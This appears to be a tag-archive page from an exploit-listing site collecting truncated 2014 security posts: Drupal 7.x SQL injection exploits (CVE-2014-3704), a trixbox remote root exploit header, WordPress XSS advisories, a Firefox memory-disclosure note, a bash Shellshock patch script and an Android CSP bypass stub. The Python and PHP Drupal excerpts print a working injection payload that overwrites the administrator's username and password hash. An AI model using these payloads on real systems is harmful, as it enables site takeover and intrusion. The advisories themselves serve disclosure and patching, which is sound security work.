Tags archives: unix

 


Drupal Core 7.32 SQL Injection

#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
#Creditz to https://www.reddit.com/user/fyukyuk
import urllib2,sys
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
if len(sys.argv) != 3:
    print "host username password"
    print "http://nope.io admin wowsecure"
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
post_data = "name[0%20;update+users+set+name%3d'" +user +"'+,+pass+%3d+'" [...]

 


Drupal Core 7.32 SQL Injection

<?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection #
# Date: Oct 16 2014 #
# Exploit Author: Dustin Dörr #
# Software Link: http://www.drupal.com/ #
# Version: Drupal core 7.x versions prior to 7.32 #
# CVE: CVE-2014-3704 #
#-----------------------------------------------------------------------------#

$url = 'http://www.example.com';
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
[...]

 


Fonality Trixbox CE 2.8.0.4 Command Execution

#!/usr/bin/perl
#
# Title: Fonality trixbox CE remote root exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered & Coded: 2 June 2014
# Published: 17 October 2014
# MorXploit Research
# http://www.MorXploit.com
# Software: trixbox CE
# Version: trixbox-2.8.0.4.iso
# Vendor url: http://www.fonality.com/
# Download: http://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/
# Vulnerable file: maint/modules/home/index.php
#
# [...]

 


Drupal 7.X SQL Injection

#!/usr/bin/python
#
#
# Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
# Inspired by yukyuk's P.o.C (https://www.reddit.com/user/fyukyuk)
#
# Tested on Drupal 7.31 with BackBox 3.x
#
# This material is intended for educational
# purposes only and the author can not be held liable for
# any kind of damages done whatsoever to your machine, [...]

 


WordPress MaxButtons 1.26.0 Cross Site Scripting

Advisory ID: HTB23237
Product: MaxButtons WordPress plugin
Vendor: Max Foundry
Vulnerable Version(s): 1.26.0 and probably prior
Tested Version: 1.26.0
Advisory Publication: September 24, 2014 [without technical details]
Vendor Notification: September 24, 2014
Vendor Patch: October 2, 2014
Public Disclosure: October 15, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-7181
Risk Level: Low
CVSSv2 Base [...]

 


WordPress WP Google Maps 6.0.26 Cross Site Scripting

Advisory ID: HTB23236
Product: WP Google Maps WordPress plugin
Vendor: WP Google Maps
Vulnerable Version(s): 6.0.26 and probably prior
Tested Version: 6.0.26
Advisory Publication: September 24, 2014 [without technical details]
Vendor Notification: September 24, 2014
Vendor Patch: September 29, 2014
Public Disclosure: October 15, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-7182
Risk Level: [...]

 


Mozilla browser mem disclosure bugs (CVE-2014-1580)

Reference: https://access.redhat.com/security/cve/CVE-2014-1580
CVE-2014-1580
Impact: Moderate
Public: 2014-10-14
Bugzilla: 1152362: CVE-2014-1580 Mozilla: Further uninitialized memory use during GIF rendering (MFSA 2014-78)
Public POC: First of all, CVE-2014-1580 (MFSA 2014-78) is a bug that caused Firefox prior to version 33 (released today) to leak bits of uninitialized memory when rendering certain types of truncated images onto <canvas>. [...]

 


CMS Subkarma Cross Site Scripting / SQL Injection

# Multiple SQL Injection & XSS on CMS SUBKARMA
# Risk: High
# CWE number: CWE-89,CWE-79
# Date: 13/10/2014
# Vendor: www.jttel.com.tw
# Author: Felipe "Renzi" Gabriel
# Contact: renzi@linuxmail.org
# Tested on: Linux Mint ; Firefox ; Sqlmap 1.0-dev-nongit-20140906
# Vulnerable Files: news.php ; [...]

 


ShellShock bash patch source

# www.mondounix.com - ShellShock bash patch source

mkdir /tmp/bash
cd /tmp/bash

# Fetch the bash 4.3 source tarball
wget http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz

# Fetch the official patches; they are numbered from 001, so the sequence starts at 1
for i in $(seq -f "%03g" 1 30); do wget http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-$i; done

tar zxvf bash-4.3.tar.gz
cd bash-4.3

# Apply the patches in order
for i in $(seq -f "%03g" 1 30); do patch -p0 < ../bash43-$i; done

./configure

make

make install [...]

 


Android 4.4 CSP Bypass

I've found a Content Security Policy bypass similar and related to the same origin policy bypass in CVE-2014-6041. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6041

I've tested this on an Android 4.3 tablet running a bunch of different browsers, including Inbrowser, Firefox, and the default Android browser on an emulator for Android 4.3.1.

HTML PoC:

<input type=button value="test" [...]